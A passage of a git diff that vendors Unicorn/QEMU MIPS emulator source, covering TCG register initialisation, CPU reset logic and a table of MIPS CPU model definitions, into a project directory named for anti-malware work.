(!SIGN_EXT_P(env->CP0_EPC)) + cpu_fprintf(f, "BROKEN: EPC=0x" TARGET_FMT_lx "\n", env->CP0_EPC); + if (!SIGN_EXT_P(env->lladdr)) + cpu_fprintf(f, "BROKEN: LLAddr=0x" TARGET_FMT_lx "\n", env->lladdr); +} +#endif + +void mips_tcg_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + TCGv **cpu_gpr; + int i; + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env"); + + if (!uc->init_tcg) { + for (i = 0; i < 32; i++) { + tcg_ctx->cpu_gpr[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_gpr[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.gpr[i]), + regnames[i]); + } + } + + cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGV_UNUSED(*cpu_gpr[0]); + + for (i = 0; i < 32; i++) { + int off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[0]); + tcg_ctx->msa_wr_d[i * 2] = + tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, off, msaregnames[i * 2]); + /* The scalar floating-point unit (FPU) registers are mapped on + * the MSA vector registers. */ + tcg_ctx->fpu_f64[i] = tcg_ctx->msa_wr_d[i * 2]; + off = offsetof(CPUMIPSState, active_fpu.fpr[i].wr.d[1]); + tcg_ctx->msa_wr_d[i * 2 + 1] = + tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, off, msaregnames[i * 2 + 1]); + } + + if (!uc->init_tcg) + tcg_ctx->cpu_PC = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_PC) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.PC), "PC"); + + if (!uc->init_tcg) { + for (i = 0; i < MIPS_DSP_ACC; i++) { + tcg_ctx->cpu_HI[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_HI[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.HI[i]), + regnames_HI[i]); + tcg_ctx->cpu_LO[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_LO[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.LO[i]), + regnames_LO[i]); + } + } + + if (!uc->init_tcg) + tcg_ctx->cpu_dspctrl = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_dspctrl) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_tc.DSPControl), + "DSPControl"); + + if (!uc->init_tcg) + tcg_ctx->bcond = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->bcond) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, bcond), "bcond"); + + if (!uc->init_tcg) + tcg_ctx->btarget = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->btarget) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, btarget), "btarget"); + + tcg_ctx->hflags = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, hflags), "hflags"); + + //tcg_ctx->fpu_fcr0 = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + // offsetof(CPUMIPSState, active_fpu.fcr0), + // "fcr0"); + tcg_ctx->fpu_fcr31 = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUMIPSState, active_fpu.fcr31), + "fcr31"); + uc->init_tcg = true; +} + +#include "translate_init.c" + +MIPSCPU *cpu_mips_init(struct uc_struct *uc, const char *cpu_model) +{ + MIPSCPU *cpu; + CPUMIPSState *env; + const mips_def_t *def; + + def = cpu_mips_find_by_name(cpu_model); + if (!def) + return NULL; + cpu = MIPS_CPU(uc, object_new(uc, TYPE_MIPS_CPU)); + env = &cpu->env; + env->cpu_model = def; + +#ifndef CONFIG_USER_ONLY + mmu_init(env, def); +#endif + fpu_init(env, def); + mvp_init(env, def); + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_state_reset(CPUMIPSState *env) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + /* Reset registers to their default values */ + env->CP0_PRid = env->cpu_model->CP0_PRid; + env->CP0_Config0 = env->cpu_model->CP0_Config0; +#ifdef TARGET_WORDS_BIGENDIAN + env->CP0_Config0 |= (1 << CP0C0_BE); +#endif + env->CP0_Config1 = env->cpu_model->CP0_Config1; + env->CP0_Config2 = env->cpu_model->CP0_Config2; + env->CP0_Config3 = env->cpu_model->CP0_Config3; + env->CP0_Config4 = env->cpu_model->CP0_Config4; + env->CP0_Config4_rw_bitmask = env->cpu_model->CP0_Config4_rw_bitmask; + env->CP0_Config5 = env->cpu_model->CP0_Config5; + env->CP0_Config5_rw_bitmask = env->cpu_model->CP0_Config5_rw_bitmask; + env->CP0_Config6 = env->cpu_model->CP0_Config6; + env->CP0_Config7 = env->cpu_model->CP0_Config7; + env->CP0_LLAddr_rw_bitmask = env->cpu_model->CP0_LLAddr_rw_bitmask + << env->cpu_model->CP0_LLAddr_shift; + env->CP0_LLAddr_shift = env->cpu_model->CP0_LLAddr_shift; + env->SYNCI_Step = env->cpu_model->SYNCI_Step; + env->CCRes = env->cpu_model->CCRes; + env->CP0_Status_rw_bitmask = env->cpu_model->CP0_Status_rw_bitmask; + env->CP0_TCStatus_rw_bitmask = env->cpu_model->CP0_TCStatus_rw_bitmask; + env->CP0_SRSCtl = env->cpu_model->CP0_SRSCtl; + env->current_tc = 0; + env->SEGBITS = env->cpu_model->SEGBITS; + env->SEGMask = (target_ulong)((1ULL << env->cpu_model->SEGBITS) - 1); +#if defined(TARGET_MIPS64) + if (env->cpu_model->insn_flags & ISA_MIPS3) { + env->SEGMask |= 3ULL << 62; + } +#endif + env->PABITS = env->cpu_model->PABITS; + env->PAMask = (target_ulong)((1ULL << env->cpu_model->PABITS) - 1); + env->CP0_SRSConf0_rw_bitmask = env->cpu_model->CP0_SRSConf0_rw_bitmask; + env->CP0_SRSConf0 = env->cpu_model->CP0_SRSConf0; + env->CP0_SRSConf1_rw_bitmask = env->cpu_model->CP0_SRSConf1_rw_bitmask; + env->CP0_SRSConf1 = env->cpu_model->CP0_SRSConf1; + env->CP0_SRSConf2_rw_bitmask = env->cpu_model->CP0_SRSConf2_rw_bitmask; + env->CP0_SRSConf2 = env->cpu_model->CP0_SRSConf2; + env->CP0_SRSConf3_rw_bitmask = env->cpu_model->CP0_SRSConf3_rw_bitmask; + env->CP0_SRSConf3 = env->cpu_model->CP0_SRSConf3; + env->CP0_SRSConf4_rw_bitmask = env->cpu_model->CP0_SRSConf4_rw_bitmask; + env->CP0_SRSConf4 = env->cpu_model->CP0_SRSConf4; + env->CP0_PageGrain_rw_bitmask = env->cpu_model->CP0_PageGrain_rw_bitmask; + env->CP0_PageGrain = env->cpu_model->CP0_PageGrain; + env->active_fpu.fcr0 = env->cpu_model->CP1_fcr0; + env->msair = env->cpu_model->MSAIR; + env->insn_flags = env->cpu_model->insn_flags; + +#if defined(CONFIG_USER_ONLY) + env->CP0_Status = (MIPS_HFLAG_UM << CP0St_KSU); +# ifdef TARGET_MIPS64 + /* Enable 64-bit register mode. */ + env->CP0_Status |= (1 << CP0St_PX); +# endif +# ifdef TARGET_ABI_MIPSN64 + /* Enable 64-bit address mode. */ + env->CP0_Status |= (1 << CP0St_UX); +# endif + /* Enable access to the CPUNum, SYNCI_Step, CC, and CCRes RDHWR + hardware registers. */ + env->CP0_HWREna |= 0x0000000F; + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + env->CP0_Status |= (1 << CP0St_CU1); + } + if (env->CP0_Config3 & (1 << CP0C3_DSPP)) { + env->CP0_Status |= (1 << CP0St_MX); + } +# if defined(TARGET_MIPS64) + /* For MIPS64, init FR bit to 1 if FPU unit is there and bit is writable. */ + if ((env->CP0_Config1 & (1 << CP0C1_FP)) && + (env->CP0_Status_rw_bitmask & (1 << CP0St_FR))) { + env->CP0_Status |= (1 << CP0St_FR); + } +# endif +#else + if (env->hflags & MIPS_HFLAG_BMASK) { + /* If the exception was raised from a delay slot, + come back to the jump. */ + env->CP0_ErrorEPC = env->active_tc.PC - 4; + } else { + env->CP0_ErrorEPC = env->active_tc.PC; + } + env->active_tc.PC = (int32_t)0xBFC00000; + env->CP0_Random = env->tlb->nb_tlb - 1; + env->tlb->tlb_in_use = env->tlb->nb_tlb; + env->CP0_Wired = 0; + env->CP0_EBase = (cs->cpu_index & 0x3FF); + env->CP0_EBase |= 0x80000000; + env->CP0_Status = (1 << CP0St_BEV) | (1 << CP0St_ERL); + /* vectored interrupts not implemented, timer on int 7, + no performance counters. */ + env->CP0_IntCtl = 0xe0000000; + { + int i; + + for (i = 0; i < 7; i++) { + env->CP0_WatchLo[i] = 0; + env->CP0_WatchHi[i] = 0x80000000; + } + env->CP0_WatchLo[7] = 0; + env->CP0_WatchHi[7] = 0; + } + /* Count register increments in debug mode, EJTAG version 1 */ + env->CP0_Debug = (1 << CP0DB_CNT) | (0x1 << CP0DB_VER); + + cpu_mips_store_count(env, 1); + + if (env->CP0_Config3 & (1 << CP0C3_MT)) { + int i; + + /* Only TC0 on VPE 0 starts as active. */ + for (i = 0; i < ARRAY_SIZE(env->tcs); i++) { + env->tcs[i].CP0_TCBind = cs->cpu_index << CP0TCBd_CurVPE; + env->tcs[i].CP0_TCHalt = 1; + } + env->active_tc.CP0_TCHalt = 1; + cs->halted = 1; + + if (cs->cpu_index == 0) { + /* VPE0 starts up enabled. */ + env->mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); + env->CP0_VPEConf0 |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); + + /* TC0 starts up unhalted. */ + cs->halted = 0; + env->active_tc.CP0_TCHalt = 0; + env->tcs[0].CP0_TCHalt = 0; + /* With thread 0 active. */ + env->active_tc.CP0_TCStatus = (1 << CP0TCSt_A); + env->tcs[0].CP0_TCStatus = (1 << CP0TCSt_A); + } + } + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + env->CP0_Status |= (1 << CP0St_CU1); + } +#endif + if ((env->insn_flags & ISA_MIPS32R6) && + (env->active_fpu.fcr0 & (1 << FCR0_F64))) { + /* Status.FR = 0 mode in 64-bit FPU not allowed in R6 */ + env->CP0_Status |= (1 << CP0St_FR); + } + + /* MSA */ + if (env->CP0_Config3 & (1 << CP0C3_MSAP)) { + msa_reset(env); + } + + compute_hflags(env); + cs->exception_index = EXCP_NONE; +} + +void restore_state_to_opc(CPUMIPSState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + env->active_tc.PC = tcg_ctx->gen_opc_pc[pc_pos]; + env->hflags &= ~MIPS_HFLAG_BMASK; + env->hflags |= tcg_ctx->gen_opc_hflags[pc_pos]; + switch (env->hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_BR: + break; + case MIPS_HFLAG_BC: + case MIPS_HFLAG_BL: + case MIPS_HFLAG_B: + env->btarget = tcg_ctx->gen_opc_btarget[pc_pos]; + break; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c new file mode 100644 index 0000000..7178d00 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate_init.c @@ -0,0 +1,948 @@ +/* + * MIPS emulation for qemu: CPU initialisation routines. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * Copyright (c) 2007 Herve Poussineau + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +/* CPU / CPU family specific config register values. */ + +/* Have config1, uncached coherency */ +#define MIPS_CONFIG0 \ + ((1U << CP0C0_M) | (0x2 << CP0C0_K0)) + +/* Have config2, no coprocessor2 attached, no MDMX support attached, + no performance counters, watch registers present, + no code compression, EJTAG present, no FPU */ +#define MIPS_CONFIG1 \ +((1U << CP0C1_M) | \ + (0 << CP0C1_C2) | (0 << CP0C1_MD) | (0 << CP0C1_PC) | \ + (1 << CP0C1_WR) | (0 << CP0C1_CA) | (1 << CP0C1_EP) | \ + (0 << CP0C1_FP)) + +/* Have config3, no tertiary/secondary caches implemented */ +#define MIPS_CONFIG2 \ +((1U << CP0C2_M)) + +/* No config4, no DSP ASE, no large physaddr (PABITS), + no external interrupt controller, no vectored interrupts, + no 1kb pages, no SmartMIPS ASE, no trace logic */ +#define MIPS_CONFIG3 \ +((0 << CP0C3_M) | (0 << CP0C3_DSPP) | (0 << CP0C3_LPA) | \ + (0 << CP0C3_VEIC) | (0 << CP0C3_VInt) | (0 << CP0C3_SP) | \ + (0 << CP0C3_SM) | (0 << CP0C3_TL)) +#define MIPS_CONFIG4 \ +((0 << CP0C4_M)) + +#define MIPS_CONFIG5 \ +((0 << CP0C5_M)) + +/* MMU types, the first four entries have the same layout as the + CP0C0_MT field. */ +enum mips_mmu_types { + MMU_TYPE_NONE, + MMU_TYPE_R4000, + MMU_TYPE_RESERVED, + MMU_TYPE_FMT, + MMU_TYPE_R3000, + MMU_TYPE_R6000, + MMU_TYPE_R8000 +}; + +struct mips_def_t { + const char *name; + int32_t CP0_PRid; + int32_t CP0_Config0; + int32_t CP0_Config1; + int32_t CP0_Config2; + int32_t CP0_Config3; + int32_t CP0_Config4; + int32_t CP0_Config4_rw_bitmask; + int32_t CP0_Config5; + int32_t CP0_Config5_rw_bitmask; + int32_t CP0_Config6; + int32_t CP0_Config7; + target_ulong CP0_LLAddr_rw_bitmask; + int CP0_LLAddr_shift; + int32_t SYNCI_Step; + int32_t CCRes; + int32_t CP0_Status_rw_bitmask; + int32_t CP0_TCStatus_rw_bitmask; + int32_t CP0_SRSCtl; + int32_t CP1_fcr0; + int32_t MSAIR; + int32_t SEGBITS; + int32_t PABITS; + int32_t CP0_SRSConf0_rw_bitmask; + int32_t CP0_SRSConf0; + int32_t CP0_SRSConf1_rw_bitmask; + int32_t CP0_SRSConf1; + int32_t CP0_SRSConf2_rw_bitmask; + int32_t CP0_SRSConf2; + int32_t CP0_SRSConf3_rw_bitmask; + int32_t CP0_SRSConf3; + int32_t CP0_SRSConf4_rw_bitmask; + int32_t CP0_SRSConf4; + int32_t CP0_PageGrain_rw_bitmask; + int32_t CP0_PageGrain; + int insn_flags; + enum mips_mmu_types mmu_type; +}; + +/*****************************************************************************/ +/* MIPS CPU definitions */ +static const mips_def_t mips_defs[] = +{ + { + "4Kc", + 0x00018000, + MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32, + MMU_TYPE_R4000, + }, + { + "4Km", + 0x00018300, + /* Config1 implemented, fixed mapping MMU, + no virtual icache, uncached coherency. */ + MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "4KEcR1", + 0x00018400, + MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32, + MMU_TYPE_R4000, + }, + { + "4KEmR1", + 0x00018500, + MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "4KEc", + 0x00019000, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (0 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1278FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2, + MMU_TYPE_R4000, + }, + { + "4KEm", + 0x00019100, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_FMT << CP0C0_MT), + MIPS_CONFIG1 | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x1258FF17, + 0, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_FMT, + }, + { + "24Kc", + 0x00019300, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + /* No DSP implemented. */ + 0x1278FF1F, + 0, + 0, + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_R4000, + }, + { + "24Kf", + 0x00019300, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + /* No DSP implemented. */ + 0x3678FF1F, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16, + MMU_TYPE_R4000, + }, + { + "34Kf", + 0x00019500, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_VInt) | (1 << CP0C3_MT) | + (1 << CP0C3_DSPP), + 0, + 0, + 32, + 2, + 0x3778FF1F, + (0 << CP0TCSt_TCU3) | (0 << CP0TCSt_TCU2) | + (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | + (0 << CP0TCSt_TMX) | (1 << CP0TCSt_DT) | + (1 << CP0TCSt_DA) | (1 << CP0TCSt_A) | + (0x3 << CP0TCSt_TKSU) | (1 << CP0TCSt_IXMT) | + (0xff << CP0TCSt_TASID), + (0xf << CP0SRSCtl_HSS), + 0, + 32, + 32, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x95 << FCR0_PRID), + 0x3fffffff, + (1U << CP0SRSC0_M) | (0x3fe << CP0SRSC0_SRS3) | + (0x3fe << CP0SRSC0_SRS2) | (0x3fe << CP0SRSC0_SRS1), + 0x3fffffff, + (1U << CP0SRSC1_M) | (0x3fe << CP0SRSC1_SRS6) | + (0x3fe << CP0SRSC1_SRS5) | (0x3fe << CP0SRSC1_SRS4), + 0x3fffffff, + (1U << CP0SRSC2_M) | (0x3fe << CP0SRSC2_SRS9) | + (0x3fe << CP0SRSC2_SRS8) | (0x3fe << CP0SRSC2_SRS7), + 0x3fffffff, + (1U << CP0SRSC3_M) | (0x3fe << CP0SRSC3_SRS12) | + (0x3fe << CP0SRSC3_SRS11) | (0x3fe << CP0SRSC3_SRS10), + 0x3fffffff, + (0x3fe << CP0SRSC4_SRS15) | + (0x3fe << CP0SRSC4_SRS14) | (0x3fe << CP0SRSC4_SRS13), + 0,0, + CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_MT, + MMU_TYPE_R4000, + }, + { + "74Kf", + 0x00019700, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | + (0 << CP0C3_VInt), + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x3778FF1F, + 0, + 0, + (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | + (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_DSPR2, + MMU_TYPE_R4000, + }, + { + /* A generic CPU providing MIPS32 Release 5 features. + FIXME: Eventually this should be replaced by a real CPU model. */ + "mips32r5-generic", + 0x00019700, + MIPS_CONFIG0 | (0x1 << CP0C0_AR) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | + (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | + (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_CA), + MIPS_CONFIG2, + MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_MSAP), + MIPS_CONFIG4 | (1U << CP0C4_M), + 0, + MIPS_CONFIG5 | (1 << CP0C5_UFR), + (0 << CP0C5_M) | (1 << CP0C5_K) | + (1 << CP0C5_CV) | (0 << CP0C5_EVA) | + (1 << CP0C5_MSAEn) | (1 << CP0C5_UFR) | + (0 << CP0C5_NFExists), + 0, + 0, + 0, + 4, + 32, + 2, + 0x3778FF1F, + 0, + 0, + (1 << FCR0_UFRP) | (1 << FCR0_F64) | (1 << FCR0_L) | + (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | + (0x93 << FCR0_PRID), + 0, + 32, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS32R5 | ASE_MIPS16 | ASE_MSA, + MMU_TYPE_R4000, + }, +#if defined(TARGET_MIPS64) + { + "R4000", + 0x00000400, + /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ + (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), + /* Note: Config1 is only used internally, the R4000 has only Config0. */ + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0xFFFFFFFF, + 4, + 16, + 2, + 0x3678FFFF, + 0, + 0, + /* The R4000 has a full 64bit FPU but doesn't use the fcr0 bits. */ + (0x5 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS3, + MMU_TYPE_R4000, + }, + { + "VR5432", + 0x00005400, + /* No L2 cache, icache size 8k, dcache size 8k, uncached coherency. */ + (1 << 17) | (0x1 << 9) | (0x1 << 6) | (0x2 << CP0C0_K0), + (1 << CP0C1_FP) | (47 << CP0C1_MMU), + 0, + 0, + 0,0, + 0,0, + 0, + 0, + 0xFFFFFFFFL, + 4, + 16, + 2, + 0x3678FFFF, + 0, + 0, + /* The VR5432 has a full 64bit FPU but doesn't use the fcr0 bits. */ + (0x54 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 40, + 32, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_VR54XX, + MMU_TYPE_R4000, + }, + { + "5Kc", + 0x00018100, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (31 << CP0C1_MMU) | + (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | + (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + 0, + 4, + 32, + 2, + 0x32F8FFFF, + 0, + 0, + 0, + 0, + 42, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64, + MMU_TYPE_R4000, + }, + { + "5Kf", + 0x00018100, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | + (1 << CP0C1_IS) | (4 << CP0C1_IL) | (1 << CP0C1_IA) | + (1 << CP0C1_DS) | (4 << CP0C1_DL) | (1 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,0, + 0,0, + 0, + 0, + + 0, + 4, + 32, + 2, + 0x36F8FFFF, + 0, + 0, + /* The 5Kf has F64 / L / W but doesn't use the fcr0 bits. */ + (1 << FCR0_D) | (1 << FCR0_S) | + (0x81 << FCR0_PRID) | (0x0 << FCR0_REV), + 0, + 42, + 36, + 0,0, 0,0, 0,0, 0,0, 0,0, 0,0, + CPU_MIPS64, + MMU_TYPE_R4000, + }, + { + "20Kc", + /* We emulate a later version of the 20Kc, earlier ones had a broken + WAIT instruction. */ + 0x000182a0, + MIPS_CONFIG0 | (0x2 << CP0C0_AT) | + (MMU_TYPE_R4000 << CP0C0_MT) | (1 << CP0C0_VI), + MIPS_CONFIG1 | (1 << CP0C1_FP) | (47 << CP0C1_MMU) | + (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | + (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | + (1 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), + MIPS_CONFIG2, + MIPS_CONFIG3, + 0,.0, + 0,0, + 0, + 0, + 0, + 0, + 32, + 1, + 0x36FBFFFF, + 0, + 0, + /* The 20Kc has F64 